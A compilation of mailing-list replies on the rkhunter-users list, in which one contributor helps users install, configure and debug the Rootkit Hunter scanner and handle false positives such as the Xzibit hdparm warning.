Re: [Rkhunter-users] Rkhunter on rpm based OS

[Helmut Hullen]

Hallo, absolutely_f...@libero.it,

Du meintest am 28.02.15:

> what is your recommended way to install Rkhunter on RPM based OS?

Sorry - what about a quick google search for

rkhunter rpm download

You find some links for several rpm based distributions, p.e. RedHat,  
Centos, Fedora, OpenSUSE.

Viele Gruesse!
Helmut


--
Dive into the World of Parallel Programming The Go Parallel Website, sponsored
by Intel and developed in partnership with Slashdot Media, is your hub for all
things parallel software development, from weekly thought leadership blogs to
news, videos, case studies, tutorials and more. Take a look and join the 
conversation now. http://goparallel.sourceforge.net/
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] Live-CD

[Helmut Hullen]

Hallo, Laurent,

Du meintest am 22.06.12:

>>  >  txz>

> Too bad, sourceforge does not keep tracks of older source packages
> version..  is that volontary ?

I have some older source packages in my backups ...

But I suppose that John Horne and/or unSpawn have better archives than I  
have.

Viele Gruesse!
Helmut

--
Live Security Virtual Conference
Exclusive live event will cover all the ways today's security and 
threat landscape has changed and how IT managers can respond. Discussions 
will include endpoint security, mobile security and the latest in malware 
threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] Live-CD

[Helmut Hullen]

Hallo, Bernd,

Du meintest am 22.06.12:

> Where can i find 1.3.8 ?


My usual source is "slackfind.net", but the side seems to have problems.

My next place:

 

Built from Corrado Franco (http://conraid.net)

Viele Gruesse!
Helmut

--
Live Security Virtual Conference
Exclusive live event will cover all the ways today's security and 
threat landscape has changed and how IT managers can respond. Discussions 
will include endpoint security, mobile security and the latest in malware 
threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] Live-CD

[Helmut Hullen]

Hallo, Bernd,

Du meintest am 21.06.12:

> is there a live cd with rootkit hunter ?

That's not impossible but difficult.

"rkhunter" first needs a run

rkhunter --propupd

to generate a file with a kind of checksums, and thereafter it compares  
the actual checksums with the data in this file..

A live cd must contain (or at least use) this file.

Viele Gruesse!
Helmut

--
Live Security Virtual Conference
Exclusive live event will cover all the ways today's security and 
threat landscape has changed and how IT managers can respond. Discussions 
will include endpoint security, mobile security and the latest in malware 
threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] can not exclude /dev/files

[Helmut Hullen]

Hallo, Marius,

Du meintest am 19.12.11:

> We have a few servers which store the php sessions in /dev/shm
> Although the rkhunter.conf has this line:
> ALLOWDEVFILE="/dev/shm/php_session/*"

> ,I still get a lot of these warnings:

> Warning: Suspicious file types found in /dev:
>   /dev/shm/php_session/f/e/sess_fe336f989061a85113e1ea6517ac1
> 246: ASCII text, with no line terminators

Perhaps

ALLOWDEVFILE="/dev/shm/php_session/*/*/*"

helps.

Viele Gruesse!
Helmut

--
Learn Windows Azure Live!  Tuesday, Dec 13, 2011
Microsoft is holding a special Learn Windows Azure training event for 
developers. It will provide a great way to learn Windows Azure and what it 
provides. You can attend the event by watching it streamed LIVE online.  
Learn more at http://p.sf.net/sfu/ms-windowsazure
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] Warning about /usr/sbin/rkhunter file after gentoo updates...

[Helmut Hullen]

Hallo, Tanstaafl,

Du meintest am 21.09.11:

> After a lot of updates on my gentoo system - one of which included a
> REBUILD of rkhunter - and *after* running --propupd, I'm getting the
> following Warning (this is the only one):

> [07:40:01] Warning: The command '/usr/sbin/rkhunter' has
> been replaced and is not a script: /usr/sbin/rkhunter: POSIX shell
> script, ASCII text executable, with very long lines

> Is this a gentoo problem that I need to report there? Or is something
> else going on?

No - it's a wide spread problem. See

   http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=641217

And in a brandnew slackware installation the problem exists too.

"file-5.07" makes no problems, "file-5.08" and "file-5.09" produce

"Warning: The command '/usr/bin/rkhunter' has been replaced and is not a
script: /usr/bin/rkhunter: POSIX shell script, ASCII text executable"

The path to "rkhunter" may be different.

Viele Gruesse!
Helmut

--
All the data continuously generated in your IT infrastructure contains a
definitive record of customers, application performance, security
threats, fraudulent activity and more. Splunk takes this data and makes
sense of it. Business sense. IT sense. Common sense.
http://p.sf.net/sfu/splunk-d2d-oct
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] Xzibit

[Helmut Hullen]

Hallo, Robert,

Du meintest am 27.07.11:

 Just upgraded to 1.3.8 now I?m getting Xzibit Rootkit.  I?m  sure
 it is a false positive,  how do I clear this error?

>>> RTKT_FILE_WHITELIST="/etc/rc.d/rc.sysinit:hdparm"


> Sorry to be late to the thread, Running Debian Squeeze and rkhunter
> 1.3.6-4. Also getting the Xzibit Rootkit warning. The problem is that
> there is no /etc/rc.d/rc.sysinit:hdparm file on my system. The
> closest I find is /etc/init.d/hdparm. Would whitelisting this work?

Just take a try!

Viele Gruesse!
Helmut

--
Got Input?   Slashdot Needs You.
Take our quick survey online.  Come on, we don't ask for help often.
Plus, you'll get a chance to win $100 to spend on ThinkGeek.
http://p.sf.net/sfu/slashdot-survey
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] sshd Rootkit not detected by rkhunter

[Helmut Hullen]

Hallo, Carlos,

Du meintest am 21.04.11:

> I've been afected by a "new" rootkit in Debian Lenny server, but
> rkhunter don't detect it.

[...]

> I think a good add-on for rkhunter is inspect the MD5 of the
> packages, A good test maybe run debsums on debian systems

Sorry - that's the job of the packet manager.

Viele Gruesse!
Helmut

--
Benefiting from Server Virtualization: Beyond Initial Workload 
Consolidation -- Increasing the use of server virtualization is a top
priority.Virtualization can reduce costs, simplify management, and improve 
application availability and disaster protection. Learn more about boosting 
the value of server virtualization. http://p.sf.net/sfu/vmware-sfdev2dev
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

[Rkhunter-users] Opyum team

[Helmut Hullen]

Hallo, rkhunter-users,

I've just seen a linux server with the following symptoms:

- in "/var/log/messages" every minute a cron message from "Opyum Team"

- lynx localhost doesn't work; the apache was dead

- restarting the apache works, but the apache dies again after some  
minutes

These problems are about 4 days old.

Searching with "google" for "Opyum rootkit" shows no usable messages.

The server gets rebuilt now; I'll see if there are some other  
footprints.

Viele Gruesse!
Helmut

--
The ultimate all-in-one performance toolkit: Intel(R) Parallel Studio XE:
Pinpoint memory and threading errors before they happen.
Find and fix more than 250 security defects in the development cycle.
Locate bottlenecks in serial and parallel code that limit performance.
http://p.sf.net/sfu/intel-dev2devfeb
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] Run rkhunter on a remote machine

[Helmut Hullen]

Hallo, Bos,,

Du meintest am 11.01.11:

> Is there a simple methode to unsubscribe?

Surely!
First: avoid HTML and attachments.

Second: look at the end or look into the header of some other mail in  
this mailing list;
there you can see the URL of the web side where you can modify or stop  
your subscription.

Viele Gruesse!
Helmut

--
Gaining the trust of online customers is vital for the success of any company
that requires sensitive data to be transmitted over the Web.   Learn how to 
best implement a security strategy that keeps consumers' information secure 
and instills the confidence they need to proceed with transactions.
http://p.sf.net/sfu/oracle-sfdevnl 
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] error: awk required for rkhunter but awk is present

[Helmut Hullen]

Hallo, Jonny,

Du meintest am 11.08.10:

>>> #BINDIR="/bin /usr/bin /sbin /usr/sbin /usr/local/bin
>>> /usr/local/sbin /usr/libexec /usr/local/libexec"
>>> BINDIR="/usr/sbin"

>> Who has damaged that configuration file? That's not the original
>> one.

[...]

> But that aside as it is not the point, the real point is that there
> seems to be a bug in that I should be able to say to not check any of
> those directories and rkhunter shiould still at least run, even with
> BINDIR=""

Oh no!
Even "rkhunter" has to trust some programs. And it's a good idea to work  
with a defined path with reliable order. Otherwise I define

PATH=~/my-special/bin:$PATH

and put all my crap into "~/my-special/bin".

Viele Gruesse!
Helmut

--
This SF.net email is sponsored by 

Make an app they can't live without
Enter the BlackBerry Developer Challenge
http://p.sf.net/sfu/RIM-dev2dev 
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] error: awk required for rkhunter but awk is present

[Helmut Hullen]

Hallo, Jonny,

Du meintest am 11.08.10:

> OK found it...seems like a bug to me...the default /etc/rkhunter.conf
> has these lines in it
> #
> # Specify the command directories to be checked. This is a
> # space-separated list of directories.
> #
> #BINDIR="/bin /usr/bin /sbin /usr/sbin /usr/local/bin /usr/local/sbin
> /usr/libexec /usr/local/libexec"
> BINDIR="/usr/sbin"

Who has damaged that configuration file? That's not the original one.

Viele Gruesse!
Helmut

--
This SF.net email is sponsored by 

Make an app they can't live without
Enter the BlackBerry Developer Challenge
http://p.sf.net/sfu/RIM-dev2dev 
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] error: awk required for rkhunter but awk is present

[Helmut Hullen]

Hallo, Jonny,

Du meintest am 11.08.10:

>>> when I try almost any command (except --version) with rkhunter it
>>> gives the error:
>>> The command 'awk' must be present on the system in order to run
>>> rkhunter.

> # echo $PATH
> /sbin:/bin:/usr/sbin:/usr/bin
> I'd like to send the log file but sadly we can't get that far...
> # rkhunter --versioncheck --vl
> The command 'awk' must be present on the system in order to run
> rkhunter.

What tells

ls -l /bin/gawk*

awk -W version

The actual GNU awk version is 3.1.8 (or newer).

Viele Gruesse!
Helmut

--
This SF.net email is sponsored by 

Make an app they can't live without
Enter the BlackBerry Developer Challenge
http://p.sf.net/sfu/RIM-dev2dev 
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] error: awk required for rkhunter but awk is present

[Helmut Hullen]

Hallo, Jonny,

Du meintest am 10.08.10:

> I'm running
> # rkhunter --version
> Rootkit Hunter 1.3.4

> on gentoo linux hardened 2.6.32

> when I try almost any command (except --version) with rkhunter it
> gives the error:
> The command 'awk' must be present on the system in order to run
> rkhunter.

> searched the web for this error but did not find a solution.

> awk is installed and works:
> # awk --version
> GNU Awk 3.1.6
> # which awk
> /bin/awk
> # ls -l /bin/awk
> lrwxrwxrwx 1 root root 10 Jul 21 15:41 /bin/awk -> gawk-3.1.6

What tells

ls -l /bin/gawk*

awk -W version

The actual GNU awk version is 3.1.8 (or newer).

The messages results from "check_required_commands", it tests "f" (files  
exist) and "x" (file is executable).

Viele Gruesse!
Helmut

--
This SF.net email is sponsored by 

Make an app they can't live without
Enter the BlackBerry Developer Challenge
http://p.sf.net/sfu/RIM-dev2dev 
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] Warnings after upgrading to Mandriva 2010.1 and rkhunter 1.3.6

[Helmut Hullen]

Hallo, Chris,

Du meintest am 10.07.10:

> After upgrading to Mandriva 2010.1 yesterday I ran rkhunter --propupd
> since I'm sure a lot of files were changed. I still got the usual
> "please check your system as it may be infected" this morning after
> the rkhunter cronjob was ran. I got to looking at the log this
> evening and noticed:

> /usr/sbin/rkhunter[ Warning ]
> Warning: The command '/usr/sbin/rkhunter' has been replaced and is
> not a script: /usr/sbin/rkhunter: a /bin/sh script text executable

Here (Slackware 13, rkhunter 1.3.6)

which -a rkhunter

only shows

/usr/bin/rkhunter

#
ls -l $(which rkhunter)

shows

... root root 425608 29. Nov 2009  /usr/bin/rkhunter

#

file $(which rkhunter)

shows

/usr/bin/rkhunter: POSIX shell script text executable

Maybe the Mandriva packet uses another path for "rkhunter": that's no  
problem.

> Checking for string 'hdparm'  [ Warning ]

> Warning: Checking for possible rootkit strings[ Warning ]
> Found string 'hdparm' in file '/etc/rc.d/init.d/bootlogd'. Possible
> rootkit: Xzibit Rootkit
> Found string 'hdparm' in file '/etc/rc.d/rc.sysinit'. Possible
> rootkit: Xzibit Rootkit

That's perhaps a false alarm - using "hdparm" in these files is allowed.

Viele Gruesse!
Helmut

--
This SF.net email is sponsored by Sprint
What will you do first with EVO, the first 4G phone?
Visit sprint.com/first -- http://p.sf.net/sfu/sprint-com-first
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora

[Helmut Hullen]

Hallo, Duane,

Du meintest am 27.05.10:


> [22:55:56] Info: Starting test name 'os_specific'
> [22:55:56]   Checking loaded kernel modules  [
> Warning ] [22:55:56] Warning: No output found from the lsmod command
> or the /proc/modules file:

That may be no problem - may be you run a kernel which loads no module.  
You will know.

Viele Gruesse!
Helmut

--

___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora

[Helmut Hullen]

Hallo, Duane,

Du meintest am 27.05.10:

> --- When I enter "which rkhunter" I get /usr/local/bin/rkhunter

Ok.

> The ls -l from /usr/local/bin/ is:

> [r...@ip-208-109-24-147 bin]# ls -l
> total 420
> -rwxr-x--- 1 root root 425606 May 27 08:12 rkhunter

Ok.

> It appears that for some reason Plesk (cron job) inserts a /bin/sh:
> prior to the "rkhunter" command.

What tells

ls -l /bin/sh

What happens if you change the cronjob call to

bash /usr/local/bin/rkhunter

Viele Gruesse!
Helmut

--

___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora

[Helmut Hullen]

Hallo, Duane,

Du meintest am 27.05.10:




> /bin/sh: /usr/bin/rkhunter: No such file or directory

> It will error with no path put in (returns: /bin/sh: rkhunter: No
> such file or directory)

What tells

which rkhunter
ls -l $(which rkhunter)

Viele Gruesse!
Helmut

--

___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora

[Helmut Hullen]

Hallo, Duane,

Du meintest am 27.05.10:


> How do I go about checking the warnings in File Properties?

> If I'm being too "questioning" please just tell me to go pound sand.
> I really appreciate your help (all of you).

Take about 20 minutes to read very slowly (with time to think about) the  
file "/etc/rkhunter.conf". It's really instructive.

And put your tries into "/etc/rkhunter.comf.local".

Viele Gruesse!
Helmut

--

___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora

[Helmut Hullen]

Hallo, Duane,

Du meintest am 26.05.10:

> -rw-r--r--  1 root root 40 May 30  2007 ..1.gz
> -rw-r--r--  1 root root 40 May 30  2007 :.1.gz
> -rw-r--r--  1 root root   3806 May 30  2007 GET.1.gz
> -rw-r--r--  1 root root   3805 May 30  2007 HEAD.1.gz
> lrwxrwxrwx  1 root root  9 Jul 19  2007 Mail.1.gz -> mail.1.gz

If you don't need them: delete them.

Viele Gruesse!
Helmut

--

___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora]

[Helmut Hullen]

Hallo, Duane,

Du meintest am 26.05.10:

>  OK .. time for another dumb question.  I seem to have several
>  "rkhunter.conf" files in different locations.  What one is the one I
>  use?

First:

which rkhunter

shows, which version of "rkhunter" is used.

locate bin/rkhunter

or

which -a rkhunter

may show additional versions.

Then:

Go to that version which is shown with the first search.

Start your "midnight commander" to take a deep look into the file.
Search for "rkhunter.conf". You will see that the program first searches  
"/etc/rkhunter.conf". If there is no file then it tries "/usr/local/etc/ 
rkhunter.conf".

Maybe

locate /rkhunter.conf

shows some more places. My traditional way: renaming them all but one  
(in this case: only "/etc/rkhunter.conf" is not renamed), and then I  
start "rkhunter" to see if all works fine.

Viele Gruesse!
Helmut

--

___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora

[Helmut Hullen]

Hallo, Duane,

Du meintest am 25.05.10:

>>> I am pretty sure I have a trojan or resident spoofer in there,

>> Why?

> I have 5 domains on the server.  One of the domains (which is a
> mirror of another domain that runs about 250 Meg / month) is running
> 5 times higher (1.2 Gig so far this month) in "email" traffic /
> bandwidth. Most of it is on the SMTP. It keeps exceeding the limits I
> have imposed.  I know the primary user (a retired Colonel and
> Investment Banker) and he's not sending out spam. However he gets a
> lot of "spoofed" mail using his address in lieu of the actual sender.

"rkhunter" only checks your server for rootkits, it doesn't check TCP/IP  
traffic, it doesn't check home directories etc. It's no virus scanner in  
the Windows way which scans for Windows virii.

Perhaps you install a classical virus scanner for those examinations  
too; "clamav" perhaps helps a bit.

> But at my age, learning is a bit slower than it was in the past.

Are you already a silver surfer (like me)?

Viele Gruesse!
Helmut

--

___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora

[Helmut Hullen]

Hallo, Duane,

Du meintest am 25.05.10:

>>  ./installer.sh --remove


>>   ./installer.sh --install

> The re-install worked!  I have done --propupd and --update and run
> the first scan after making some mods in the rkhunter.conf file.

Fine!


> I am pretty sure I have a trojan or resident spoofer in there,
> especially on one of the domains that has bandwidth / traffic going
> thru the roof.

Maybe "rkhunter" cannot find every crap. It searches for some "well  
known" cases, but the other test is wether a file has/was changed.

"propupd" produces a hash list of many files, and "rkhunter" compares  
the actual hash with the listed hash. If some rootkit has changed some  
critical file last week then the "propupd" run from yesterday stores the  
infected file "as good".

The best way in this case is reinstalling at least the "base" packages  
or (even better) reinstalling the complete system from CD.

Perhaps you know the tale of "Little Red Riding Hood" (you are using  
RedHat, you should know the tale): the girl tries to examine the wolfe,  
but she fails.

Viele Gruesse!
Helmut

--

___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora

[Helmut Hullen]

Hallo, Duane,

Du meintest am 25.05.10:

>> bash -x rkhunter --propupd 2>/tmp/rkh.log

> + get_installdir_option
> ++ get_option 1 single INSTALLDIR
> ++ OPTTYPE=1
> ++ OPTMULTI=single
> ++ OPTV=INSTALLDIR
> +++ grep -h '^INSTALLDIR=' /usr/local/etc/rkhunter.conf
> ++ '[' -z '' ']'
> ++ echo ''
> ++ return 0
> + RKHINSTALLDIR=
> + '[' -z '' ']'
> + echo 'Invalid INSTALLDIR configuration option - no installation
> directory specified.'
> + exit 1

I've just seen that your system now runs. In the above debug lines you  
can see that "rkhunter" has searched "INSTALLDIR" in "/usr/local/etc/ 
rkhunter.conf" and couldn't find such an entry.

Now it works - that's fine!

Viele Gruesse!
Helmut

--

___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora

[Helmut Hullen]

Hallo, Duane,

Du meintest am 25.05.10:

> I installed from the tarball (rkhunter-1.3.6.tar.gz)

> Is this "staying in the thread"?

Splendid!

But for the error:

bash -x rkhunter --propupd 2>/tmp/rkh.log

And then look in "/tmp/rkh.log" for "get_installdir_option" (until  
"get_rootdir_option").

In my case some lines before "return" I see

RKHINSTALLDIR=/usr

(as in "/etc/rkhunter.conf": INSTALLDIR=/usr")

(By the way: don't toppost ...)

Viele Gruesse!
Helmut

--

___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora

[Helmut Hullen]

Hallo, Duane,

Du meintest am 25.05.10:

> 1.  John Horne says: It hasn't installed properly, try re-installing.
> The INSTALLDIR option must exist for RKH to run.

> Is there any guidance on re-installing?  Obviously, whatever I did to
> initally "install" wasn't very successful.

What have you tried:

installing from the tarball (rkhunter-version.tar.gz)
or
installing a Fedora *.rpm

>  - do I need to uninstall first?  If so how.

"That depends" ...

> 2.  Have I been successful in eliminating HTML from this email?

Yes - delightful!

> 3.  How do I reply and keep this in the thread.  Helmut Hullen points
> out that I was not, "Please keep the traffic in the mailing list -
> thank you."

And again: delightful!
(..fully? Please excuse my gerlish)

Viele Gruesse!
Helmut

--

___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] Intallation Error (INSTALLDIR)

[Helmut Hullen]

Hallo, John,

Du meintest am 25.05.10:

>> By the way - you (or some other instructed person) should update the
>> "Tested on" list on
>>
>> http://www.rootkit.nl/projects/rootkit_hunter.html
>>
>>

> That is not the official RKH web site. (It is the old one, so not for
> us to maintain.)

Is that now the official web site?

http://sourceforge.net/apps/trac/rkhunter/wiki/SPRKH

The english Wikipedia shows it on

http://en.wikipedia.org/wiki/Rkhunter

Viele Gruesse!
Helmut

--

___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] Intallation Error (INSTALLDIR)

[Helmut Hullen]

Hallo, John,

Du meintest am 25.05.10:

>> I've installed rkhunter on my virtual server (RedHat Fedora Core 6)

> FC6 is very old, and unsupported you realise.

By the way - you (or some other instructed person) should update the  
"Tested on" list on

http://www.rootkit.nl/projects/rootkit_hunter.html


Viele Gruesse!
Helmut

--

___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] rkhunter/cron Red Hat Fedora Core 6 - ooops

[Helmut Hullen]

Hallo, Duane,

Du meintest am 24.05.10 zum Thema Re: [Rkhunter-users] rkhunter/cron Red Hat 
Fedora Core 6 - ooops:

> I've been successful in getting rkhunter installed and permissions
> and simlinks working.

> But the issue of the INSTALLDIR error remains.

> "[r...@ip-208-109-24-147 ~]# rkhunter --update
> Invalid INSTALLDIR configuration option - no installation directory
> specified."

> INSTALLDIR is not in the rkhunter.conf file.

Please keep the traffic in the mailing list - thank you!

Look into the script "rkhunter" (may be in "/usr/bin"), search for  
"RKHINSTALLDIR".

There you find that "INSTALLDIR" has to be set from the installer  
script.

In my installation (slackware) I find "INSTALLDIR=/usr" at the end of "/ 
etc/rkhunter.conf"

Viele Gruesse!
Helmut

--

___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] rkhunter/cron Red Hat Fedora Core 6 - ooops

[Helmut Hullen]

Hallo, Mike,

Du meintest am 25.05.10 zum Thema Re: [Rkhunter-users] rkhunter/cron Red Hat 
Fedora Core 6 - ooops:

>>> I tried to install rkhunter on my Redhat Fedora Core 6 virtual
>>> server (GoDaddy). But what I get for email notification is:

>> That's a very ancient version, nearly 4 years old. Please try a
>> newer one, perhaps fedora 11 or 12.

> Tscha! Ich hab' FC2.

> The version of Fedora shouldn't matter.

Please keep the traffic in the mailing list - thank you.

Have you installed an *.rpm packet, or have you installed "from scratch"  
with the "installer.sh" script?

Viele Gruesse!
Helmut

--

___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] rkhunter/cron Red Hat Fedora Core 6 - ooops

[Helmut Hullen]

Hallo, Duane,

Du meintest am 24.05.10:

> I tried to install rkhunter on my Redhat Fedora Core 6 virtual server
> (GoDaddy). But what I get for email notification is:

That's a very ancient version, nearly 4 years old. Please try a newer  
one, perhaps fedora 11 or 12.

Viele Gruesse!
Helmut

--

___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] Warnings after update from 1.3.4 to 1.3.6

[Helmut Hullen]

Hallo, Tanstaafl,

Du meintest am 19.05.10:

> Ooops - now I need the 1.3.4 version, and can't find it on the
> sourceforge site:


ftp://hullen.hopto.org/rkhunter-1.3.4-noarch-1cf.tgz

It's an ancient tarball.
I prefer to unwrap such a packet with the "midnight commander", just  
pressing the "enter" key. Then it's self explaining ...

The machine is offline from 20 o'clock to 5 o'clock UTC. You have more  
than 5 hours from now!

Viele Gruesse!
Helmut

--

___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] Warnings after update from 1.3.4 to 1.3.6

[Helmut Hullen]

Hallo, Tanstaafl,

Du meintest am 19.05.10:

>> All you have to do is run RKH with the debug option. Something like:
>>
>> rkhunter --debug --enable properties
>>
>> This should create a file in the /tmp directory, it may be fairly
>> large. If you send me (not the list) both files, then I can take a
>> look.

> Sorry, should have been clearer...

> I googled how to do that, but what I balked at was installing both
> versions side by side...

It's quite simple!

Look for the file "/usr/bin/rkhunter" - it's a pure shellscript (nearly  
human readable, for some kind of humans).

rkhunter -V

tells you the actual version.

If you first copy your current version to "rkhunter-1.3.6" (if that's  
the version), then you can copy the older version into "/usr/bin" too,  
get that version and rename it too.

And then you call

rkhunter-1.3.4 --debug --enable properties
rkhunter-1.3.6 --debug --enable properties

You get 2 files /tmp/rkhunter-debug.xyz (with different characters after  
the dot); send them to John Horne.

Finally you copy your favorite version back to "rkhunter".

Viele Gruesse!
Helmut

--

___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] Warnings after update from 1.3.4 to 1.3.6

[Helmut Hullen]

Hallo, Tanstaafl,

Du meintest am 16.05.10:

>  [03:11:58] Warning: Checking for possible rootkit strings[
> Warning ]  [03:11:58]  Found string 'hdparm' in file
> '/etc/init.d/hdparm'. Possible rootkit: Xzibit Rootkit
>  [03:11:58]  Found string 'hdparm' in file
> '/etc/init.d/pciparm'. Possible rootkit: Xzibit Rootkit

>> The 'hdparm' one is possibly a false-positive, but that's for you to
>> check.

> Ok, well, I examined the two scripts, and didn't see anything unusual
> about them... but I'm not a forensics expert, just a lowly admin
> wanna-be... any other suggestions/pointers?

See the thread "rcs files", just a week old.

I had solved the "Xzibit" warnings with

RTKT_FILE_WHITELIST=/etc/init.d/boot.local
# wegen Xzibit

etc.

Viele Gruesse!
Helmut

--

___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] rcs files

[Helmut Hullen]

Hallo, John,

Du meintest am 09.05.10:

>>> Why are you whitelisting this file? It is not checked for as a
>>> rootkit file.
>>
>> You can see the reason in the remark line: "rkhunter" guessed there
>> might be a "xzibit" virus. Together with "/etc/init.d/boot.local".

> Ah, okay. I assume the file (boot.local) contains 'hdparm' in it?

You're right - for forced setting DMA. And there are still machines who  
need that way.

Viele Gruesse!
Helmut

--

___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] rcs files

[Helmut Hullen]

Hallo, John,

Du meintest am 09.05.10:

>> RTKT_FILE_WHITELIST=/etc/init.d/RCS/boot.local.neu,v
>> # wegen Xzibit

> Why are you whitelisting this file? It is not checked for as a
> rootkit file.

You can see the reason in the remark line: "rkhunter" guessed there  
might be a "xzibit" virus. Together with "/etc/init.d/boot.local".

"boot.local" is a script with 85 lines and 2 kByte - may I post it here?

Viele Gruesse!
Helmut

--

___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] howto requested: eliminate Dica-Kit Rootkit

[Helmut Hullen]

Hallo, Michael,

Du meintest am 07.05.10:


> Today I ran the rkhunter-1.3.6, first with the --propupd, and got:
> sudo rkhunter --propupd[ Rootkit Hunter version 1.3.6 ]
> File updated: searched for 156 files, found 83, missing hashes 83

=>> Are the missing hashes a problem for the check?

No problem. (perhaps ...)

> When running the check, it found the "Dica-Kit Rootkit", here is an
> excerpt of the log file:

> [15:01:32] Checking for Dica-Kit Rootkit...

> [15:01:33] Checking for file '/etc/sshd_config'[ Found ]

[...]

> [15:01:34] Warning: Dica-Kit Rootkit   [ Warning ]
> [15:01:34]File '/etc/sshd_config' found

> I then checked the file '/etc/sshd_config' but did not know what to
> look for.

I don't know how OS-X is organized; under Linux the file "sshd_config"  
should be in the directory "/etc/ssh".


> Then the test continued and there was warning no 2:

> [15:02:38]   Performing check for possible rootkit strings
